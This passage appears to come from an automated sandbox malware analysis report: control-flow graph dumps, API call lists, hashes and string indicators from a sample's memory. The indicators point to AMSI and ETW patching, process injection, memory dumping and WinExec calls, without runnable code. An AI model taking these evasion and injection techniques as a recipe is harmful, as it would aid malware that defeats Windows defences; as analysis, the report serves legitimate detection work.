2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b24d8c * 2 call 2b24734 call 2b3dac4 5563->5821 5822 2b49212-2b49413 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b249a4 call 2b38ba8 5563->5822 5674 2b47fc3-2b47fc6 5573->5674 5675 2b47fc8-2b482e8 call 2b249a4 call 2b3dc88 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b3cf9c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c 5573->5675 5574->5573 5674->5675 5989 2b48301-2b48ae4 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c ResumeThread call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c CloseHandle call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b37ecc call 2b38798 * 6 CloseHandle call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c 5675->5989 5990 2b482ea-2b482fc call 2b3857c 5675->5990 5821->5822 5822->5554 5989->5464 5990->5989
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 02B3881C: LoadLibraryA.KERNEL32(00000000,00000000,02B38903), ref: 02B38850
                                                                                                                                • Part of subcall function 02B3881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02B38903), ref: 02B38860
                                                                                                                                • Part of subcall function 02B3881C: GetProcAddress.KERNEL32(74F60000,00000000), ref: 02B38879
                                                                                                                                • Part of subcall function 02B3881C: FreeLibrary.KERNEL32(74F60000,00000000,02B81388,Function_000065D8,00000004,02B81398,02B81388,000186A3,00000040,02B8139C,74F60000,00000000,00000000,00000000,00000000,02B38903), ref: 02B388E3
                                                                                                                              • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02C757DC,02C75820,OpenSession,02B8137C,02B4AFD0,UacScan,02B8137C), ref: 02B47E31
                                                                                                                              • ResumeThread.KERNEL32(00000000,ScanBuffer,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0,UacScan,02B8137C,02B4AFD0,ScanBuffer,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0), ref: 02B4847B
                                                                                                                              • CloseHandle.KERNEL32(00000000,ScanBuffer,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0,UacScan,02B8137C,02B4AFD0,00000000,ScanBuffer,02B8137C,02B4AFD0,OpenSession,02B8137C), ref: 02B485FA
                                                                                                                                • Part of subcall function 02B38798: LoadLibraryW.KERNEL32(bcrypt,?,00000900,00000000,02B813A4,02B3A3BF,ScanString,02B813A4,02B3A774,ScanBuffer,02B813A4,02B3A774,Initialize,02B813A4,02B3A774,UacScan), ref: 02B387AC
                                                                                                                                • Part of subcall function 02B38798: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B387C6
                                                                                                                                • Part of subcall function 02B38798: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000900,00000000,02B813A4,02B3A3BF,ScanString,02B813A4,02B3A774,ScanBuffer,02B813A4,02B3A774,Initialize), ref: 02B38802
                                                                                                                              • CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,02B8137C,02B4AFD0,UacInitialize,02B8137C,02B4AFD0,ScanBuffer,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0,UacScan,02B8137C), ref: 02B489EC
                                                                                                                                • Part of subcall function 02B27E10: GetFileAttributesA.KERNEL32(00000000,?,02B3F8C4,ScanString,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0,ScanString,02B8137C,02B4AFD0,UacScan,02B8137C,02B4AFD0,UacInitialize), ref: 02B27E1B
                                                                                                                                • Part of subcall function 02B3DAC4: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B3DB96), ref: 02B3DB03
                                                                                                                                • Part of subcall function 02B3DAC4: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02B3DB3D
                                                                                                                                • Part of subcall function 02B3DAC4: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02B3DB6A
                                                                                                                                • Part of subcall function 02B3DAC4: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02B3DB73
                                                                                                                                • Part of subcall function 02B38184: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02B3820E), ref: 02B381F0
                                                                                                                              • ExitProcess.KERNEL32(00000000,OpenSession,02B8137C,02B4AFD0,ScanBuffer,02B8137C,02B4AFD0,Initialize,02B8137C,02B4AFD0,00000000,00000000,00000000,ScanString,02B8137C,02B4AFD0), ref: 02B4AA1D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Library$CloseFileHandle$AddressCreateFreeLoadPathProcProcess$AttributesCacheExitFlushInstructionModuleNameName_ResumeThreadUserWrite
                                                                                                                              • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                                                                              • API String ID: 2481178504-1225450241
                                                                                                                              • Opcode ID: 2b3c76ede034ed0ee09bdfa421ab2afbaa0b07440bc8918fee9bf0f59240d5aa
                                                                                                                              • Instruction ID: e49ed1a94925b7c19387c904880e2041d7018f32ab8e7507339f81a9f34ad271
                                                                                                                              • Opcode Fuzzy Hash: 2b3c76ede034ed0ee09bdfa421ab2afbaa0b07440bc8918fee9bf0f59240d5aa
                                                                                                                              • Instruction Fuzzy Hash: 6543FA75A502688FDB12EB64DD809DE73B6AF84300F1045E6E50EEBA14DE30AE8DDF51

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 8535 2b21724-2b21736 8536 2b21968-2b2196d 8535->8536 8537 2b2173c-2b2174c 8535->8537 8540 2b21973-2b21984 8536->8540 8541 2b21a80-2b21a83 8536->8541 8538 2b217a4-2b217ad 8537->8538 8539 2b2174e-2b2175b 8537->8539 8538->8539 8546 2b217af-2b217bb 8538->8546 8542 2b21774-2b21780 8539->8542 8543 2b2175d-2b2176a 8539->8543 8544 2b21986-2b219a2 8540->8544 8545 2b21938-2b21945 8540->8545 8547 2b21684-2b216ad VirtualAlloc 8541->8547 8548 2b21a89-2b21a8b 8541->8548 8552 2b21782-2b21790 8542->8552 8553 2b217f0-2b217f9 8542->8553 8549 2b21794-2b217a1 8543->8549 8550 2b2176c-2b21770 8543->8550 8554 2b219b0-2b219bf 8544->8554 8555 2b219a4-2b219ac 8544->8555 8545->8544 8551 2b21947-2b2195b Sleep 8545->8551 8546->8539 8556 2b217bd-2b217c9 8546->8556 8557 2b216df-2b216e5 8547->8557 8558 2b216af-2b216dc call 2b21644 8547->8558 8551->8544 8559 2b2195d-2b21964 Sleep 8551->8559 8565 2b217fb-2b21808 8553->8565 8566 2b2182c-2b21836 8553->8566 8561 2b219c1-2b219d5 8554->8561 8562 2b219d8-2b219e0 8554->8562 8560 2b21a0c-2b21a22 8555->8560 8556->8539 8563 2b217cb-2b217de Sleep 8556->8563 8558->8557 8559->8545 8567 2b21a24-2b21a32 8560->8567 8568 2b21a3b-2b21a47 8560->8568 8561->8560 8572 2b219e2-2b219fa 8562->8572 8573 2b219fc-2b219fe call 2b215cc 8562->8573 8563->8539 8571 2b217e4-2b217eb Sleep 8563->8571 8565->8566 8575 2b2180a-2b2181e Sleep 8565->8575 8569 2b218a8-2b218b4 8566->8569 8570 2b21838-2b21863 8566->8570 8567->8568 8576 2b21a34 8567->8576 8579 2b21a68 8568->8579 8580 2b21a49-2b21a5c 8568->8580 8581 2b218b6-2b218c8 8569->8581 8582 2b218dc-2b218eb call 2b215cc 8569->8582 8577 2b21865-2b21873 8570->8577 8578 2b2187c-2b2188a 8570->8578 8571->8538 8583 2b21a03-2b21a0b 8572->8583 8573->8583 8575->8566 8585 2b21820-2b21827 Sleep 8575->8585 8576->8568 8577->8578 8586 2b21875 8577->8586 8587 2b218f8 8578->8587 8588 2b2188c-2b218a6 call 2b21500 8578->8588 8590 2b21a6d-2b21a7f 8579->8590 8589 2b21a5e-2b21a63 call 2b21500 8580->8589 8580->8590 8591 2b218ca 8581->8591 8592 2b218cc-2b218da 8581->8592 8594 2b218fd-2b21936 8582->8594 8600 2b218ed-2b218f7 8582->8600 8585->8565 8586->8578 8587->8594 8588->8594 8589->8590 8591->8592 8592->8594
                                                                                                                              APIs
                                                                                                                              • Sleep.KERNEL32(00000000,?,02B22000), ref: 02B217D0
                                                                                                                              • Sleep.KERNEL32(0000000A,00000000,?,02B22000), ref: 02B217E6
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Sleep
                                                                                                                              • String ID: ) $0`
                                                                                                                              • API String ID: 3472027048-916312839
                                                                                                                              • Opcode ID: 9de52f03e330f1c44f43be050e076900e70a83814b8bf743001a668f2b839b8a
                                                                                                                              • Instruction ID: 7c5f3a25644ed6ebf611e114c42ff20b3baec98efa00132b2af18c46f2bfe774
                                                                                                                              • Opcode Fuzzy Hash: 9de52f03e330f1c44f43be050e076900e70a83814b8bf743001a668f2b839b8a
                                                                                                                              • Instruction Fuzzy Hash: 02B12072A103608BDB15CF2CD880356BBE1EF85394F1886EAE65D8F386D730E559CB90

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 10477 2b21a8c-2b21a9b 10478 2b21aa1-2b21aa5 10477->10478 10479 2b21b6c-2b21b6f 10477->10479 10482 2b21aa7-2b21aae 10478->10482 10483 2b21b08-2b21b11 10478->10483 10480 2b21b75-2b21b7f 10479->10480 10481 2b21c5c-2b21c60 10479->10481 10485 2b21b81-2b21b8d 10480->10485 10486 2b21b3c-2b21b49 10480->10486 10489 2b21c66-2b21c6b 10481->10489 10490 2b216e8-2b2170b call 2b21644 VirtualFree 10481->10490 10487 2b21ab0-2b21abb 10482->10487 10488 2b21adc-2b21ade 10482->10488 10483->10482 10484 2b21b13-2b21b27 Sleep 10483->10484 10484->10482 10491 2b21b2d-2b21b38 Sleep 10484->10491 10494 2b21bc4-2b21bd2 10485->10494 10495 2b21b8f-2b21b92 10485->10495 10486->10485 10492 2b21b4b-2b21b5f Sleep 10486->10492 10496 2b21ac4-2b21ad9 10487->10496 10497 2b21abd-2b21ac2 10487->10497 10498 2b21af3 10488->10498 10499 2b21ae0-2b21af1 10488->10499 10506 2b21716 10490->10506 10507 2b2170d-2b21714 10490->10507 10491->10483 10492->10485 10502 2b21b61-2b21b68 Sleep 10492->10502 10500 2b21b96-2b21b9a 10494->10500 10501 2b21bd4-2b21bd9 call 2b214c0 10494->10501 10495->10500 10504 2b21af6-2b21b03 10498->10504 10499->10498 10499->10504 10508 2b21bdc-2b21be9 10500->10508 10509 2b21b9c-2b21ba2 10500->10509 10501->10500 10502->10486 10504->10480 10512 2b21719-2b21723 10506->10512 10507->10512 10508->10509 10511 2b21beb-2b21bf2 call 2b214c0 10508->10511 10513 2b21bf4-2b21bfe 10509->10513 10514 2b21ba4-2b21bc2 call 2b21500 10509->10514 10511->10509 10516 2b21c00-2b21c28 VirtualFree 10513->10516 10517 2b21c2c-2b21c59 call 2b21560 10513->10517
                                                                                                                              APIs
                                                                                                                              • Sleep.KERNEL32(00000000,?,?,00000000,02B21FE4), ref: 02B21B17
                                                                                                                              • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,02B21FE4), ref: 02B21B31
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Sleep
                                                                                                                              • String ID: 0`
                                                                                                                              • API String ID: 3472027048-3339448193
                                                                                                                              • Opcode ID: a297bb532582eea2dead0f3834fa86ed68ce71cfb470d0296401e5b04c65e6b3
                                                                                                                              • Instruction ID: 15f6aa8c18e736209029873f2ff6309f338767204e6b9020b7871a9205268b97
                                                                                                                              • Opcode Fuzzy Hash: a297bb532582eea2dead0f3834fa86ed68ce71cfb470d0296401e5b04c65e6b3
                                                                                                                              • Instruction Fuzzy Hash: D7519D716213608FE715CF6C8988756BBE4EF46314F1886EEE54C8B283E770D549CBA1

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • LoadLibraryW.KERNEL32(amsi), ref: 02B3870D
                                                                                                                                • Part of subcall function 02B380C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B38148,?,?,00000000,00000000,?,02B38061,00000000,KernelBASE,00000000,00000000,02B38088), ref: 02B3810D
                                                                                                                                • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B38113
                                                                                                                                • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(?,?), ref: 02B38125
                                                                                                                                • Part of subcall function 02B37CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B37D6C
                                                                                                                              • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02B3876C
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
                                                                                                                              • String ID: DllGetClassObject$W$amsi
                                                                                                                              • API String ID: 941070894-2671292670
                                                                                                                              • Opcode ID: 5d64c744f737d4c36fb827dc9532959cc4cbb49c1899778a38b492eef03d278d
                                                                                                                              • Instruction ID: 37abefbfcc5c8ee36c11fd9ee1d11580322bfdfa4d3143f1c517c61cdc131b6d
                                                                                                                              • Opcode Fuzzy Hash: 5d64c744f737d4c36fb827dc9532959cc4cbb49c1899778a38b492eef03d278d
                                                                                                                              • Instruction Fuzzy Hash: 46F068A054C381B9E202E6748C45F4BBFCE4B52224F448A9DF1E85A2D2DA75D10497B7

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02B3E42E
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CheckConnectionInternet
                                                                                                                              • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                              • API String ID: 3847983778-3852638603
                                                                                                                              • Opcode ID: ef807b0571ce6bb4c34373b662ac0581569047f813d11b172c8a42f20411da7e
                                                                                                                              • Instruction ID: d096c1d191ac557db11252cd9f16b43f3203b39444e2382723f994a6279957dc
                                                                                                                              • Opcode Fuzzy Hash: ef807b0571ce6bb4c34373b662ac0581569047f813d11b172c8a42f20411da7e
                                                                                                                              • Instruction Fuzzy Hash: D4412135B102189FEB02EBA4DC41ADEB3FAEF4C710F1148A6E555B7A50DA74ED098F50

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • LoadLibraryA.KERNEL32(00000000,00000000,02B38903), ref: 02B38850
                                                                                                                              • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02B38903), ref: 02B38860
                                                                                                                              • GetProcAddress.KERNEL32(74F60000,00000000), ref: 02B38879
                                                                                                                                • Part of subcall function 02B37CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B37D6C
                                                                                                                              • FreeLibrary.KERNEL32(74F60000,00000000,02B81388,Function_000065D8,00000004,02B81398,02B81388,000186A3,00000040,02B8139C,74F60000,00000000,00000000,00000000,00000000,02B38903), ref: 02B388E3
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Library$AddressFreeHandleLoadMemoryModuleProcVirtualWrite
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1543721669-0
                                                                                                                              • Opcode ID: 50eff430e3eb5ad79b795481d1ff15eef59c9c414066a1f6dba77ab2eddfd947
                                                                                                                              • Instruction ID: 6746e6d7a2ee8829c2ce62925da09a310af8d5375e1c9a0bc673fc3e8ef8fb9f
                                                                                                                              • Opcode Fuzzy Hash: 50eff430e3eb5ad79b795481d1ff15eef59c9c414066a1f6dba77ab2eddfd947
                                                                                                                              • Instruction Fuzzy Hash: 1D115EB1A51318BFEB01FBA8CC01A5E77AEEB45700F5048E4B60CF7A90DA749D16DB15
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 02B38018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B38088,?,?,00000000,?,02B379FE,ntdll,00000000,00000000,02B37A43,?,?,00000000), ref: 02B38056
                                                                                                                                • Part of subcall function 02B38018: GetModuleHandleA.KERNELBASE(?), ref: 02B3806A
                                                                                                                                • Part of subcall function 02B380C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B38148,?,?,00000000,00000000,?,02B38061,00000000,KernelBASE,00000000,00000000,02B38088), ref: 02B3810D
                                                                                                                                • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B38113
                                                                                                                                • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(?,?), ref: 02B38125
                                                                                                                              • WinExec.KERNEL32(?,?), ref: 02B38470
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HandleModule$AddressProc$Exec
                                                                                                                              • String ID: Kernel32$WinExec
                                                                                                                              • API String ID: 2292790416-3609268280
                                                                                                                              • Opcode ID: 2678400622ca416fd6e548489f690ef4354d33f3ffc8af8695e591d23c9f204b
                                                                                                                              • Instruction ID: 5248a44913d1f95b3415932f54802902e221bda5d31eb823c03394d0ff59fdc0
                                                                                                                              • Opcode Fuzzy Hash: 2678400622ca416fd6e548489f690ef4354d33f3ffc8af8695e591d23c9f204b
                                                                                                                              • Instruction Fuzzy Hash: CB01A439654304BFEB02EFA8DC41F5A77EDE748710F5184A0B508D7E50D634AD04DE22
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 02B38018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B38088,?,?,00000000,?,02B379FE,ntdll,00000000,00000000,02B37A43,?,?,00000000), ref: 02B38056
                                                                                                                                • Part of subcall function 02B38018: GetModuleHandleA.KERNELBASE(?), ref: 02B3806A
                                                                                                                                • Part of subcall function 02B380C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B38148,?,?,00000000,00000000,?,02B38061,00000000,KernelBASE,00000000,00000000,02B38088), ref: 02B3810D
                                                                                                                                • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B38113
                                                                                                                                • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(?,?), ref: 02B38125
                                                                                                                              • WinExec.KERNEL32(?,?), ref: 02B38470
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
